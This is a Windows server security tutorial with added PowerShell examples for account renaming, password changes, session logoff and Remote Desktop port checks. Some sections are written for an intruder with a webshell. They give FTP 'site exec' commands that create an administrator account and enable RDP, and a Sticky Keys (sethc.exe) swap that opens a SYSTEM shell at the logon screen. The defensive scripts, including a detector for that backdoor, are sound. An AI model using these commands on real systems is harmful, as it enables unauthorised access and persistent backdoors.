Server Security Tutorials

Source: Internet
Author: User
Tags: delete key

"Miscellaneous Tips" Server security tutorial

One. Change the server's default administrator user name

Click Start → Run → gpedit.msc (Local Group Policy Editor) → Computer Configuration → Windows Settings → Security Settings → Local Policies → Security Options → "Accounts: Rename administrator account" (double-click) → in the local policy setting, enter the user name you want, then OK. Renaming removes the obvious target name from brute-force and password-spray lists, but the account keeps its well-known RID 500 SID, so it is still identifiable by tools that enumerate SIDs; combine the rename with a strong password rather than relying on it alone.

Two. Change the server password

There are three ways to change a user's password on the server from a remote session:

First, right-click "My Computer" → "Manage" → "Local Users and Groups" → "Users", find your administrator account, right-click it and choose "Set Password". Windows shows a security warning. This path is an administrative reset: the old password is not supplied, so EFS-encrypted files, saved credentials and other DPAPI-protected data belonging to that account become unreadable after the change. For an account that holds none of those, the warning does not affect normal use. Restarting the computer afterwards does not change this either way.

Second, Start → "Windows Security". Inside a Remote Desktop session this has the same effect as pressing Ctrl+Alt+Del on the console; click "Change password". Because the old password is presented, Windows re-keys the account's DPAPI master keys and the NTFS (EFS) encryption information is not lost.

Third, press Ctrl+Alt+End inside the Remote Desktop session instead of Ctrl+Alt+Delete (which the local machine would intercept). This opens the same security screen as the second method.

The second and third methods are recommended. The first method (opening account management and resetting) is what you fall back to when the password has been forgotten.
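As an added example (not code from the original page), here is the same work from an elevated PowerShell prompt, covering section One (renaming the built-in administrator) and section Two (changing its password). It assumes Windows 10 / Server 2016 or later, where the Microsoft.PowerShell.LocalAccounts cmdlets exist; the new account name 'svc_ops_admin' is a placeholder, and passwords are read interactively so they never land in the command line or history. The two password functions mirror the page's distinction: Set-LocalUser is an administrative reset (the warning from method one applies), while ChangePassword on the WinNT ADSI provider presents the old password and so behaves like methods two and three.

```powershell
# Added example, not from the original page. Run from an elevated PowerShell session.
# Assumptions: Microsoft.PowerShell.LocalAccounts is available (Windows 10 / Server 2016+);
# 'svc_ops_admin' is a placeholder for the name you actually want.

# --- Section One: rename the built-in administrator ----------------------------------
# Locate it by RID rather than by name: the built-in administrator's SID always ends
# in -500, whether or not someone has renamed it already.
$builtinAdmin = Get-LocalUser | Where-Object { $_.SID.Value -like 'S-1-5-21-*-500' }
$newName = 'svc_ops_admin'

if ($builtinAdmin.Name -ne $newName) {
    Rename-LocalUser -Name $builtinAdmin.Name -NewName $newName
    Write-Host "Renamed '$($builtinAdmin.Name)' to '$newName' (SID unchanged: $($builtinAdmin.SID))"
}

# --- Section Two, method one: administrative reset -----------------------------------
# Equivalent to "Set Password" in Local Users and Groups. No old password is needed,
# which is exactly why EFS files and saved credentials protected with the old
# password become unreadable. Use this only when the old password is unknown.
function Reset-LocalAccountPassword {
    param([Parameter(Mandatory)][string]$Name)
    $new = Read-Host -AsSecureString -Prompt "New password for $Name (reset)"
    Set-LocalUser -Name $Name -Password $new
}

# --- Section Two, methods two and three: change with the old password ----------------
# Equivalent to Ctrl+Alt+Del / Ctrl+Alt+End -> "Change password". Because the old
# password is presented, Windows re-keys the account's DPAPI master keys and the
# NTFS/EFS encryption information survives.
function Update-LocalAccountPassword {
    param([Parameter(Mandatory)][string]$Name)
    $old = Read-Host -AsSecureString -Prompt "Current password for $Name"
    $new = Read-Host -AsSecureString -Prompt "New password for $Name"
    # ChangePassword on the WinNT ADSI provider takes plain strings; unwrap the
    # SecureStrings only for the duration of the call.
    $oldPlain = [System.Net.NetworkCredential]::new('', $old).Password
    $newPlain = [System.Net.NetworkCredential]::new('', $new).Password
    $user = [ADSI]"WinNT://$env:COMPUTERNAME/$Name,user"
    $user.ChangePassword($oldPlain, $newPlain)
}

Update-LocalAccountPassword -Name $newName

# Verify: name changed, RID 500 intact, account still enabled, password timestamp fresh.
Get-LocalUser -Name $newName | Format-List Name, SID, Enabled, PasswordLastSet
```

Reset-LocalAccountPassword is defined but not called, on purpose: run it only when the current password is genuinely lost, because it is the path that loses EFS and stored-credential data.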

 

Three. Logging off a system user from a webshell

First, run query user to list the logged-on sessions and their session IDs.
Then log the user off with logoff <ID>, where ID is the session ID shown in the previous step. Check the ID before running it: logging off your own session, or an administrator's active console session, is noticed immediately.
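As an added example (not from the original page), here is the same two-step procedure in PowerShell: parse the output of query user (quser) into objects, then log off only the sessions that belong to a named account. The account name 'intruder' is a placeholder, the parser assumes the English column layout of quser, and -WhatIf lists the matching sessions before anything is actually ended, which is what you want when the session you are about to kill might be your own.

```powershell
# Added example, not from the original page. 'intruder' is a placeholder account name.
# Assumes the English-language quser output format (USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME).

function Get-UserSession {
    # quser prints a fixed-width table; the caller's own session is prefixed with '>'.
    # Disconnected sessions have an empty SESSIONNAME column, so the session name is
    # optional and the ID is the numeric field directly before the STATE word.
    $pattern = '^\s*(?<User>\S+)\s+(?:(?<Session>\S+)\s+)?(?<Id>\d+)\s+(?<State>Active|Disc)\s+(?<Idle>\S+)\s+(?<Logon>.+?)\s*$'
    quser 2>$null | Select-Object -Skip 1 | ForEach-Object {
        $line = $_ -replace '^>', ' '
        if ($line -match $pattern) {
            [pscustomobject]@{
                User    = $Matches.User
                Session = $Matches.Session
                Id      = [int]$Matches.Id
                State   = $Matches.State
                Idle    = $Matches.Idle
                Logon   = $Matches.Logon
            }
        }
    }
}

function Disconnect-UserByName {
    [CmdletBinding(SupportsShouldProcess)]
    param([Parameter(Mandatory)][string]$User)

    # Never log off the session this script is running in.
    $mine = [int](Get-Process -Id $PID).SessionId

    foreach ($s in Get-UserSession | Where-Object { $_.User -ieq $User }) {
        if ($s.Id -eq $mine) {
            Write-Warning "Session $($s.Id) is the one running this script; skipping."
            continue
        }
        if ($PSCmdlet.ShouldProcess("session $($s.Id) ($($s.User), $($s.State))", 'logoff')) {
            logoff $s.Id
        }
    }
}

# Dry run first (prints what would be logged off), then for real.
Disconnect-UserByName -User 'intruder' -WhatIf
Disconnect-UserByName -User 'intruder'
```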

Four. Enabling 3389 (Remote Desktop) from CMD

Method one:

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Method two: create a .bat file containing the following code and run it on the server with execute permission. It writes a temporary .reg file, imports it silently and deletes it. The Wds\rdpwd\Tds\tcp key is the legacy listener-port location used on Windows 2000/XP/2003; on later versions only WinStations\RDP-Tcp is consulted. fDenyTSConnections takes effect immediately, but a changed PortNumber is only picked up after the Terminal Services service (or the machine) restarts, and the Windows Firewall must also allow the chosen port.

echo Windows Registry Editor Version 5.00>3389.reg
echo.>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg
echo "fDenyTSConnections"=dword:00000000>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
regedit /s 3389.reg
del 3389.reg

Five. From a webshell, see what port the administrator has moved 3389 to

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber

This command shows the port the Remote Desktop listener is configured to use; the default displays as 0xd3d, which is 3389 in decimal.

In fact two commonly used CMD commands are enough to settle the question, because the registry only says what the port should be after the next service restart, while the running service shows what it actually is.

First, run:

tasklist /svc

Image Name                     PID Services
========================= ====== =============================================
System Idle Process            0 N/A
System                         4 N/A
Smss.exe                     704
Csrss.exe                    772
Winlogon.exe                 796
Services.exe                 840 Eventlog, Plugplay
Lsass.exe                    852 PolicyAgent, ProtectedStorage, SAMSS
Svchost.exe                 1028 Dcomlaunch, TermService    // TermService is the Remote Desktop (3389) service; note its PID: 1028
Svchost.exe                 1092 RpcSs
Svchost.exe                 1180 Audiosrv, Browser, Cryptsvc, Dhcp, Dmserver,
                                 EventSystem, Fastuserswitchingcompatibility,
                                 LanManServer, LanmanWorkstation, Netman,
                                 Nla, RasMan, Seclogon, SENS, SharedAccess,
                                 ShellHWDetection, TAPISRV, Themes, Trkwks,
                                 W32Time, WinMgmt, Wscsvc, Wuauserv, WZCSVC
Svchost.exe                 1260 DnsCache
Svchost.exe                 1336 LmHosts, SSDPSRV, WebClient
Spoolsv.exe                 1416 Spooler
Explorer.EXE                1788
Vsnpstd3.exe                1948
Egui.exe                    1968
Ctfmon.exe                  2044
Ekrn.exe                     484 EKRN
Svchost.exe                  604 stisvc
Wdfmgr.exe                   620 UMWDF
Alg.exe                      324 ALG
Iexplore.exe                2552
Cmd.exe                     2236
Conime.exe                   124
Wmiprvse.exe                 292
Mstsc.exe                   3580
Tasklist.exe                 188
====================================================================================================

Then use netstat to see the port numbers:

netstat -ano

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       1092
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5389           0.0.0.0:0              LISTENING       1028   // PID 1028 from above: Remote Desktop is answering on port 5389, not 3389
  TCP    60.xxx.xxx.xxx:1349    220.xxx.xxx.xxx:8081   TIME_WAIT       0
  TCP    60.xxx.xxx.xxx:1360    121.xxx.xxx.xxx:8449   TIME_WAIT       0
  TCP    60.xxx.xxx.xxx:1525    121.xxx.xxx.xxx:80     TIME_WAIT       0
  TCP    127.0.0.1:1030         0.0.0.0:0              LISTENING       324
  TCP    127.0.0.1:1522         127.0.0.1:30606        TIME_WAIT       0
  TCP    127.0.0.1:30606        0.0.0.0:0              LISTENING       484
  TCP    127.0.0.1:30606        127.0.0.1:1520         TIME_WAIT       0
  TCP    192.168.1.12:139       0.0.0.0:0              LISTENING       4
  UDP    0.0.0.0:445            *:*                                    4
  UDP    0.0.0.0:500            *:*                                    852
  UDP    0.0.0.0:4500           *:*                                    852
  UDP    60.xxx.xxx.xxx:123     *:*                                    1180
  UDP    60.xxx.xxx.xxx:1900    *:*                                    1336
  UDP    127.0.0.1:123          *:*                                    1180
  UDP    127.0.0.1:1047         *:*                                    2552
  UDP    127.0.0.1:1900         *:*                                    1336
  UDP    192.168.1.12:123       *:*                                    1180
  UDP    192.168.1.12:137       *:*                                    4
  UDP    192.168.1.12:138       *:*                                    4
  UDP    192.168.1.12:1900      *:*                                    1336

C:\>
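As an added example (not code from the original page), the PowerShell below answers the questions of sections Four and Five without reading the listings by hand: it reads fDenyTSConnections and the configured PortNumber, then finds the svchost.exe hosting TermService and lists the TCP ports that PID is actually listening on, the same PID-to-port correlation the tasklist /svc and netstat -ano output above makes manually. It assumes Windows 8 / Server 2012 or later (for Get-NetTCPConnection and Get-NetFirewallRule) and the built-in English 'Remote Desktop' firewall rule group name.

```powershell
# Added example, not from the original page. Run as an administrator.

function Get-RdpStatus {
    $tsRoot = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'

    # fDenyTSConnections: 1 = Remote Desktop disabled, 0 = enabled (what the reg add above sets).
    $deny = (Get-ItemProperty -Path $tsRoot -Name fDenyTSConnections).fDenyTSConnections

    # PortNumber is a DWORD; 0xd3d = 3389 is the default. This is what the listener
    # will use after the next TermService restart, not necessarily what it uses now.
    $configured = (Get-ItemProperty -Path "$tsRoot\WinStations\RDP-Tcp" -Name PortNumber).PortNumber

    # Step 1 of the manual procedure (tasklist /svc): which PID hosts TermService?
    $svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='TermService'"

    # Step 2 (netstat -ano, filtered by that PID): which TCP ports is it listening on?
    $listening = @()
    if ($svc.State -eq 'Running') {
        $listening = @(Get-NetTCPConnection -State Listen -OwningProcess $svc.ProcessId -ErrorAction SilentlyContinue |
                       Select-Object -ExpandProperty LocalPort -Unique)
    }

    # The firewall must also admit the port; the built-in rule group only covers 3389.
    $fwEnabled = @(Get-NetFirewallRule -DisplayGroup 'Remote Desktop' -ErrorAction SilentlyContinue |
                   Where-Object { $_.Enabled -eq 'True' -and $_.Direction -eq 'Inbound' }).Count -gt 0

    [pscustomobject]@{
        Enabled        = ($deny -eq 0)
        ConfiguredPort = $configured
        ServiceState   = $svc.State
        ServicePid     = $svc.ProcessId
        ListeningPorts = $listening
        PortMismatch   = ($listening.Count -gt 0 -and $configured -notin $listening)
        FirewallRule   = $fwEnabled
    }
}

$status = Get-RdpStatus
$status | Format-List

if ($status.PortMismatch) {
    Write-Warning "Registry says $($status.ConfiguredPort) but TermService is listening on $($status.ListeningPorts -join ', '); the service has not been restarted since the port was changed."
}
if ($status.Enabled -and $status.ConfiguredPort -ne 3389 -and $status.FirewallRule) {
    Write-Warning 'Non-default port: the built-in Remote Desktop firewall rules only open 3389, so add a rule for the new port.'
}
```

On the host shown in the listings above, this would report ConfiguredPort from the registry and ListeningPorts = 5389 for PID 1028; a mismatch between the two means a port change that has not yet been applied.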

Six. FTP "quote site exec" command series

These are typed into an FTP client. quote sends the raw command to the server, and SITE EXEC asks the server to run it on the host; this only works when the FTP server implements SITE EXEC and the logged-in account is permitted to use it, which is also why, on a server you defend, SITE EXEC should be disabled or restricted to trusted accounts.

quote site exec net user 381400744 381400744 /add    Add a user

quote site exec net localgroup Administrators 381400744 /add    Add user 381400744 to the Administrators group

quote site exec shutdown -r -t 0    Remotely restart the server

quote site exec reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f    Remotely enable the 3389 port

quote site exec tasklist /svc >>jilu.txt    These two lines remotely check what the administrator changed the 3389 port to, saving the output to a file named jilu.txt
quote site exec netstat -ano >>jilu.txt


Seven. Summary of classic privilege-escalation techniques

Method 1: Replace sethc.exe with cmd.exe directly, so the Shift-key (Sticky Keys) backdoor opens a command prompt

copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe /y
copy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc.exe /y

The second copy overwrites the Windows File Protection cache copy on Windows XP/2003, so the swap is not silently reverted. On Windows Vista and later there is no dllcache and system32 binaries are owned by TrustedInstaller, so the copy needs takeown and icacls on sethc.exe first.

After reaching the logon screen: press Shift five times. The cmd.exe installed as sethc.exe opens as SYSTEM before anyone has authenticated, and from it you can start explorer.exe to get a desktop.
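As an added example (not code from the original page), this PowerShell check detects the swap described in Method 1 from the defender's side. It compares the SHA-256 hash of each accessibility binary in System32 with that of cmd.exe, and also looks for an Image File Execution Options Debugger value on the same names, a variant of the same logon-screen backdoor that leaves sethc.exe itself untouched. Signature status alone is not enough: a copy of cmd.exe renamed to sethc.exe is still a catalog-signed Microsoft binary, so the hash comparison is the check that matters. The list of target binaries is an assumption about which programs the logon screen can launch.

```powershell
# Added example, not from the original page. Run as an administrator on the host being checked.

function Test-AccessibilityBackdoor {
    $sys32   = Join-Path $env:SystemRoot 'System32'
    $cmdHash = (Get-FileHash -Path (Join-Path $sys32 'cmd.exe') -Algorithm SHA256).Hash
    $ifeo    = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'

    # Binaries the logon screen will launch for a user who has not authenticated yet.
    $targets = 'sethc.exe', 'utilman.exe', 'osk.exe', 'narrator.exe', 'magnify.exe', 'displayswitch.exe', 'atbroker.exe'

    foreach ($name in $targets) {
        $path = Join-Path $sys32 $name
        if (-not (Test-Path -Path $path)) { continue }

        $hash = (Get-FileHash -Path $path -Algorithm SHA256).Hash
        $sig  = Get-AuthenticodeSignature -FilePath $path

        # A Debugger value makes Windows run another program instead of $name.
        $debugger = (Get-ItemProperty -Path (Join-Path $ifeo $name) -Name Debugger -ErrorAction SilentlyContinue).Debugger

        [pscustomobject]@{
            File         = $name
            IsCmdExe     = ($hash -eq $cmdHash)   # Method 1 above: same bytes as cmd.exe
            Signature    = $sig.Status            # stays 'Valid' for a renamed cmd.exe, hence the hash check
            IfeoDebugger = $debugger              # non-empty = IFEO variant of the backdoor
            Suspicious   = ($hash -eq $cmdHash) -or ($sig.Status -ne 'Valid') -or (-not [string]::IsNullOrEmpty($debugger))
        }
    }
}

$results = Test-AccessibilityBackdoor
$results | Format-Table -AutoSize

$bad = @($results | Where-Object Suspicious)
if ($bad.Count -gt 0) {
    Write-Warning ("Logon-screen backdoor indicators on: " + ($bad.File -join ', ') + ". Restore from a known-good copy and remove any IFEO Debugger values.")
} else {
    'No accessibility binary has been replaced and no IFEO debugger is set.'
}
```

Run it from a scheduled task or your EDR's script facility and alert on any row with Suspicious = True; on a clean host every accessibility binary has its own hash, a valid signature and no Debugger value.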

